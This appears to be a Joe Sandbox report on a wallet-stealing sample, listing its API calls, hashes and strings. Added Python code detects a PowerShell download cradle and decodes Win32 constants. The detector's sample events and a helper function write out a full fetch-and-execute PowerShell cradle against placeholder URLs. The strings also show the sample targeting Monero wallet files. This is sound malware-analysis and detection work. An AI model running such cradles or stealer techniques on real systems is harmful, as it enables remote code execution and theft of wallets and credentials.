                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 3031569214-898575020
                                  • Opcode ID: 9a2cdbdb6a0156c4406ae2e1acd31e7138cecae313575d142631518217f29812
                                  • Instruction ID: b35056b44221f5116a487bd855acf4820086373c862b7c84e9691c3c2ccc1ed7
                                  • Opcode Fuzzy Hash: 9a2cdbdb6a0156c4406ae2e1acd31e7138cecae313575d142631518217f29812
                                  • Instruction Fuzzy Hash: 99418C71D10108ABDF14FBA0C8A2FFDBBB9AF14700F404599E11566192EFB56A49CF91
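The record above carries the three string fragments of a PowerShell download cradle (`-nop -c "iex(New-Object Net.WebClient).DownloadString('`, the URL, `')"`) together with the hard-coded path of the 32-bit PowerShell host, launched through ShellExecuteEx; the URL is supplied at runtime and does not appear in the listing. Below is an added example, not part of the Joe Sandbox report: a Python detector for that cradle run over process-creation events that are constructed here (parent image plus command line, placeholder URLs under example.invalid). It strips backtick escapes, collapses case and whitespace, reports which indicators fired and extracts the URL. Two points worth carrying into a detection rule: `iex` together with `DownloadString` is the strong signal, whereas `-nop` on its own is common in legitimate automation; and a process that spells out `C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` is unusual, because for a 32-bit caller WOW64 file-system redirection would have mapped a System32 path there anyway. `cradle_from_report` rebuilds the command line from the fragments on the page in the order I assume they are concatenated (path first, then the switches and the quoted script).

```python
"""Detect the iex(New-Object Net.WebClient).DownloadString(...) cradle in process events."""
import re

# Constructed process-creation events: (parent image, command line).
# The first reproduces the cradle from the report with a placeholder URL;
# the second is benign automation; the third is an obfuscated variant.
SAMPLE_EVENTS = [
    ("file.exe",
     r'"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -nop -c '
     '"iex(New-Object Net.WebClient).DownloadString(\'http://example.invalid/x.ps1\')"'),
    ("explorer.exe",
     'powershell.exe -NoProfile -Command "Get-Process | Out-File C:\\temp\\p.txt"'),
    ("svchost.exe",
     'powershell.exe -w hidden -ep bypass -c "ie`x (New-Object Net.WebClient)'
     '.Download`String(\'https://example.invalid/a\')"'),
]

# Indicators evaluated on the normalised (lower-case, backtick-free) command line.
INDICATORS = [
    ("invoke-expression", lambda s: re.search(r"\b(iex|invoke-expression)\b", s) is not None),
    ("webclient",         lambda s: "net.webclient" in s),
    ("downloadstring",    lambda s: ".downloadstring(" in s),
    # -nop, -nopr, -noprofile: PowerShell accepts any unambiguous prefix.
    ("noprofile",         lambda s: re.search(r"(?:^| )-nop\w*(?: |$)", s) is not None),
    ("hidden-window",     lambda s: re.search(r"(?:^| )-w\w* hidden(?: |$)", s) is not None),
    ("wow64-powershell",  lambda s: "\\syswow64\\windowspowershell\\" in s),
]

URL_RE = re.compile(r"downloadstring\(\s*['\"]([^'\"]+)['\"]", re.IGNORECASE)


def normalise(cmdline):
    """Undo cheap obfuscation: backtick escapes in barewords, case and spacing."""
    return re.sub(r"\s+", " ", cmdline.replace("`", "")).lower().strip()


def analyse_cmdline(cmdline):
    """Return the indicators found, the verdict and the downloaded URL if any."""
    norm = normalise(cmdline)
    hits = [name for name, test in INDICATORS if test(norm)]
    m = URL_RE.search(cmdline.replace("`", ""))
    return {
        "cradle": "invoke-expression" in hits and "downloadstring" in hits,
        "indicators": hits,
        "url": m.group(1) if m else None,
    }


def scan(events):
    """One finding per event whose command line is a download cradle."""
    findings = []
    for parent, cmdline in events:
        result = analyse_cmdline(cmdline)
        if result["cradle"]:
            findings.append({"parent": parent, **result})
    return findings


def cradle_from_report(url):
    """Rebuild the command line the function above assembles around URL (assumed order)."""
    return (r'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe '
            '-nop -c "iex(New-Object Net.WebClient).DownloadString(\'' + url + '\')"')


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

`scan` flags the first and third events and leaves the `-NoProfile` administration command alone; the extracted URL is what you would pivot on (DNS, proxy logs) once the cradle is seen.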
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,0130E038,00000000,00020119,?), ref: 00BB4344
                                  • RegQueryValueExA.ADVAPI32(?,0130E930,00000000,00000000,00000000,000000FF), ref: 00BB4368
                                  • RegCloseKey.ADVAPI32(?), ref: 00BB4372
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB4397
                                  • lstrcat.KERNEL32(?,0130E6C0), ref: 00BB43AB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 690832082-0
                                  • Opcode ID: f613565ad36b07f545fb24a74018dd7c7bd51d798c2c2d3750f16211d8461eee
                                  • Instruction ID: 6c7ffe08deaaacb711e655837fec0bc9942db6240c36c11d7840f57f427308ab
                                  • Opcode Fuzzy Hash: f613565ad36b07f545fb24a74018dd7c7bd51d798c2c2d3750f16211d8461eee
                                  • Instruction Fuzzy Hash: F44165B6D001086BDB24FBA0EC56FFE777CAB88700F404998B71956181EAB556CC8BE1
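The API lines in these records show every argument as raw hex. Added example, not part of the Joe Sandbox report: a small Python annotator that decodes the constants whose meaning is fixed by the API prototype into their Win32 names (the sample lines are copied from the records above; the argument-position tables and the name tables are mine). Read that way the records say more than the listing does. `00020119` passed to RegOpenKeyExA is `KEY_READ | KEY_WOW64_64KEY`, so this 32-bit sample deliberately reads the native 64-bit registry view rather than the WOW64-redirected one; `0000001C` in SHGetFolderPathA is CSIDL_LOCAL_APPDATA, the base for the `\Monero\wallet.keys` path built nearby; CreateFileA is called with GENERIC_READ, FILE_SHARE_READ and OPEN_EXISTING, a plain read of an existing file; `00000040` to LocalAlloc is LPTR (fixed, zero-initialised). Two caveats when reading these lines: the plugin prints a fixed number of stack slots, so the "arguments" shown for zero-argument calls such as GetProcessHeap belong to neighbouring frames and are not decoded here, and the value shown for ShellExecuteEx (`0000003C`) is the cbSize field of the SHELLEXECUTEINFOA the caller fills in (60 bytes in a 32-bit process), not a pointer. As a general note on the CurrentBuildNumber and "Windows 11" records above: ProductName still reads "Windows 10" on Windows 11, which is why stealers typically derive the OS name from the build number.

```python
"""Decode Win32 constants in the "APIs" lines of a Joe Sandbox function record."""
import re

LINE_RE = re.compile(
    r"(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<dll>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
HEX_RE = re.compile(r"[0-9A-Fa-f]{1,8}")

GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
           0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
HKEY = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
        0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
# Composite rights first so they are consumed before their member bits.
SAM = {0xF003F: "KEY_ALL_ACCESS", 0x20019: "KEY_READ", 0x20006: "KEY_WRITE",
       0x1: "KEY_QUERY_VALUE", 0x2: "KEY_SET_VALUE", 0x4: "KEY_CREATE_SUB_KEY",
       0x8: "KEY_ENUMERATE_SUB_KEYS", 0x10: "KEY_NOTIFY", 0x20: "KEY_CREATE_LINK",
       0x100: "KEY_WOW64_64KEY", 0x200: "KEY_WOW64_32KEY"}
CSIDL = {0x00: "CSIDL_DESKTOP", 0x05: "CSIDL_PERSONAL", 0x1A: "CSIDL_APPDATA",
         0x1C: "CSIDL_LOCAL_APPDATA", 0x26: "CSIDL_PROGRAM_FILES", 0x28: "CSIDL_PROFILE"}
LMEM = {0x00: "LMEM_FIXED", 0x02: "LMEM_MOVEABLE",
        0x40: "LPTR (LMEM_FIXED|LMEM_ZEROINIT)", 0x42: "LHND (LMEM_MOVEABLE|LMEM_ZEROINIT)"}


def decode_bits(value, table):
    """Render a flag word as NAME|NAME, leaving unknown bits as hex."""
    names, rest = [], value
    for bit, name in table.items():
        if bit and rest & bit == bit:
            names.append(name)
            rest &= ~bit
    if rest or not names:
        names.append(hex(rest))
    return "|".join(names)


def decode_exact(value, table):
    return table.get(value, hex(value))


# api -> {argument index: (parameter name, decoder)}; indices follow the SDK prototypes.
DECODERS = {
    "CreateFileA": {1: ("dwDesiredAccess", lambda v: decode_bits(v, GENERIC)),
                    2: ("dwShareMode", lambda v: decode_bits(v, SHARE)),
                    4: ("dwCreationDisposition", lambda v: decode_exact(v, DISPOSITION))},
    "RegOpenKeyExA": {0: ("hKey", lambda v: decode_exact(v, HKEY)),
                      3: ("samDesired", lambda v: decode_bits(v, SAM))},
    "SHGetFolderPathA": {1: ("csidl", lambda v: decode_exact(v, CSIDL))},
    "LocalAlloc": {0: ("uFlags", lambda v: decode_exact(v, LMEM))},
    # The plugin shows the cbSize the caller stores into SHELLEXECUTEINFOA, not the pointer.
    "ShellExecuteEx": {0: ("cbSize", lambda v: "sizeof(SHELLEXECUTEINFOA), 32-bit"
                           if v == 0x3C else hex(v))},
}


def decode_line(line):
    """Parse one '• Api.DLL(args), ref: addr' line; None if it is not an API line."""
    m = LINE_RE.search(line)
    if not m:
        return None
    raw = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
    notes = {}
    for idx, (name, fn) in DECODERS.get(m.group("api"), {}).items():
        if idx < len(raw) and HEX_RE.fullmatch(raw[idx]):   # skip '?' and string args
            notes[name] = fn(int(raw[idx], 16))
    return {"api": m.group("api"), "dll": m.group("dll"),
            "ref": m.group("ref").upper(), "args": raw, "notes": notes}


def annotate(lines):
    out = []
    for line in lines:
        d = decode_line(line)
        if d is not None:
            detail = ", ".join(f"{k}={v}" for k, v in d["notes"].items()) or "-"
            out.append(f"{d['api']} @{d['ref']}: {detail}")
    return out


# Lines copied from the function records in this report.
REPORT_LINES = [
    "• CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BAA13C",
    "• LocalAlloc.KERNEL32(00000040,?), ref: 00BAA181",
    "• RegOpenKeyExA.ADVAPI32(80000002,012FC808,00000000,00020119,00000000), ref: 00BB786D",
    "• Part of subcall function 00BB8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BB8F9B",
    "• ShellExecuteEx.SHELL32(0000003C), ref: 00BB2FD5",
    "• RegOpenKeyExA.ADVAPI32(80000001,0130E038,00000000,00020119,?), ref: 00BB4344",
]

if __name__ == "__main__":
    for s in annotate(REPORT_LINES):
        print(s)
```

Extending the tables to other APIs in the report (the Process32First/OpenProcess/TerminateProcess group, for instance) is a matter of adding prototypes to `DECODERS`; the parser itself is the same for every record.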
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: dllmain_raw$dllmain_crt_dispatch
                                  • String ID:
                                  • API String ID: 3136044242-0
                                  • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                  • Instruction ID: 72618c3709308321d08471461110ff17b5c45e2a8a898622ce3f1bee9b18b4c2
                                  • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                  • Instruction Fuzzy Hash: 9E218172D80628ABDB219E59CCD19FF7A79EB83B90F054115F82967211C3308ED1BBE0
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BB7FC7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB7FCE
                                  • RegOpenKeyExA.ADVAPI32(80000002,012FC8B0,00000000,00020119,?), ref: 00BB7FEE
                                  • RegQueryValueExA.ADVAPI32(?,0130E2D8,00000000,00000000,000000FF,000000FF), ref: 00BB800F
                                  • RegCloseKey.ADVAPI32(?), ref: 00BB8022
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: a3889a1388f86b5bf9fd8054140c604668bb238ef5bc06d5e7b79d13297e97c9
                                  • Instruction ID: 0a01c9c99554452281bc6b20f7f60e301598d928803fa3bc362242742f7b4983
                                  • Opcode Fuzzy Hash: a3889a1388f86b5bf9fd8054140c604668bb238ef5bc06d5e7b79d13297e97c9
                                  • Instruction Fuzzy Hash: 47118CB1A44205EFD700DB95DD85FBBBBBCEB04B10F104159F619A7290D7B55948CBA0
                                  APIs
                                  • StrStrA.SHLWAPI(0130E7E0,00000000,00000000,?,00BA9F71,00000000,0130E7E0,00000000), ref: 00BB93FC
                                  • lstrcpyn.KERNEL32(00E77580,0130E7E0,0130E7E0,?,00BA9F71,00000000,0130E7E0), ref: 00BB9420
                                  • lstrlen.KERNEL32(00000000,?,00BA9F71,00000000,0130E7E0), ref: 00BB9437
                                  • wsprintfA.USER32 ref: 00BB9457
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpynlstrlenwsprintf
                                  • String ID: %s%s
                                  • API String ID: 1206339513-3252725368
                                  • Opcode ID: 96b36fe65eaf1d00a3e8adae2a1843a4fc9aad8b296dff8de0f46e73d6c1e348
                                  • Instruction ID: 75307a337f3faa716e4cc7e30eb9de35bf876a73fa2538bb704a097df759d2ec
                                  • Opcode Fuzzy Hash: 96b36fe65eaf1d00a3e8adae2a1843a4fc9aad8b296dff8de0f46e73d6c1e348
                                  • Instruction Fuzzy Hash: C901DE75504208FFCB04DFA8D945EAE7BB8EB48314F108298F94DAB355D731EA44DB90
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BA12B4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BA12BB
                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00BA12D7
                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00BA12F5
                                  • RegCloseKey.ADVAPI32(?), ref: 00BA12FF
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: 937257889d4805b83858086e45df6df75c7fa22982f48b3894296f287349bbff
                                  • Instruction ID: 7c16f0af8f7ab4cbe54d39a5146074c5ef2c6a22753e470d59017d76b5cb2cba
                                  • Opcode Fuzzy Hash: 937257889d4805b83858086e45df6df75c7fa22982f48b3894296f287349bbff
                                  • Instruction Fuzzy Hash: 200131B9A44309BFDB00DFE5DC49FAE77B8EB48700F004198FA59E7290D7709A448B90
                                  APIs
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: String___crt$Type
                                  • String ID:
                                  • API String ID: 2109742289-3916222277
                                  • Opcode ID: 33033ca6541ea913157003c32bb7e2a59f22637abf022ac490571e03a9b9d2ea
                                  • Instruction ID: c5755937d3d5e75f87b66451a308440b10639143885992428e2612c422ec7071
                                  • Opcode Fuzzy Hash: 33033ca6541ea913157003c32bb7e2a59f22637abf022ac490571e03a9b9d2ea
                                  • Instruction Fuzzy Hash: 5A41C3B110079C5FDB31CB248D95FFBBFE8DB55704F1444E8E98A96182E2B19A44DFA0
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00BB6903
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00BB69C6
                                  • ExitProcess.KERNEL32 ref: 00BB69F5
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                  • String ID: <
                                  • API String ID: 1148417306-4251816714
                                  • Opcode ID: 69a796ea951324618e0a938ea4b94b3884f593b30bc9958a78df304c1ae45153
                                  • Instruction ID: 684d6a0a39ad44d91e66828ff95169084846d9b87498db44eb6ebd7b89d8f459
                                  • Opcode Fuzzy Hash: 69a796ea951324618e0a938ea4b94b3884f593b30bc9958a78df304c1ae45153
                                  • Instruction Fuzzy Hash: 0C31ECB1901118ABDB14EFA0DD92FEDBBB8AF44300F4041D9F21976191DFB46A88CF65
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00BC0E10,00000000,?), ref: 00BB89BF
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB89C6
                                  • wsprintfA.USER32 ref: 00BB89E0
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: 30438ad181f88fa13e0775df3f75069e305924f07fe8b2ad1fc9a4caad977187
                                  • Instruction ID: 5b77c5f0da38e754016ec42cfd05ec9e4713ae1048d2a97011ddc7573406b5d9
                                  • Opcode Fuzzy Hash: 30438ad181f88fa13e0775df3f75069e305924f07fe8b2ad1fc9a4caad977187
                                  • Instruction Fuzzy Hash: 15216DB1A44308AFDB00DF95DC45FAEBBB8FB48710F104159FA19B7290C775A940CBA0
                                  APIs
                                  • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00BAA098
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                  • API String ID: 1029625771-1545816527
                                  • Opcode ID: c68a05701f7511b4c6788353a68adcdb16745db2331efb7b9681ca9c94c3d3e3
                                  • Instruction ID: e099f03c890911c49917bbbc839d457a22bd7bef36bedddcd5661bbf7f4ce8cc
                                  • Opcode Fuzzy Hash: c68a05701f7511b4c6788353a68adcdb16745db2331efb7b9681ca9c94c3d3e3
                                  • Instruction Fuzzy Hash: 11F0177064C200FFD710EBA6ED49BA636E4E306304F5008A9E58DB72E0C7B499CCCB66
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00BB96AE,00000000), ref: 00BB8EEB
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB8EF2
                                  • wsprintfW.USER32 ref: 00BB8F08
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesswsprintf
                                  • String ID: %hs
                                  • API String ID: 769748085-2783943728
                                  • Opcode ID: 03d57d401bb14edc8826c6be92c1af0fbefb2a3677f8a35e36460eca3d697e9b
                                  • Instruction ID: 791173a01ab55b14b53da82ad65214fb768601d284136862c85af6044c4584ee
                                  • Opcode Fuzzy Hash: 03d57d401bb14edc8826c6be92c1af0fbefb2a3677f8a35e36460eca3d697e9b
                                  • Instruction Fuzzy Hash: 02E08CB0A48308FFDB00DB95DD0AE6D77B8EB04301F000094FD4DA7360DA719E408B91
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                    • Part of subcall function 00BB8CF0: GetSystemTime.KERNEL32(00BC0E1B,0130AA18,00BC05B6,?,?,00BA13F9,?,0000001A,00BC0E1B,00000000,?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BB8D16
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BAAA11
                                  • lstrlen.KERNEL32(00000000,00000000), ref: 00BAAB2F
                                  • lstrlen.KERNEL32(00000000), ref: 00BAADEC
                                    • Part of subcall function 00BBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BBAAF6
                                  • DeleteFileA.KERNEL32(00000000), ref: 00BAAE73
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                    • Part of subcall function 00BB8CF0: GetSystemTime.KERNEL32(00BC0E1B,0130AA18,00BC05B6,?,?,00BA13F9,?,0000001A,00BC0E1B,00000000,?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BB8D16
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BAD581
                                  • lstrlen.KERNEL32(00000000), ref: 00BAD798
                                  • lstrlen.KERNEL32(00000000), ref: 00BAD7AC
                                  • DeleteFileA.KERNEL32(00000000), ref: 00BAD82B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                    • Part of subcall function 00BB8CF0: GetSystemTime.KERNEL32(00BC0E1B,0130AA18,00BC05B6,?,?,00BA13F9,?,0000001A,00BC0E1B,00000000,?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BB8D16
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BAD901
                                  • lstrlen.KERNEL32(00000000), ref: 00BADA9F
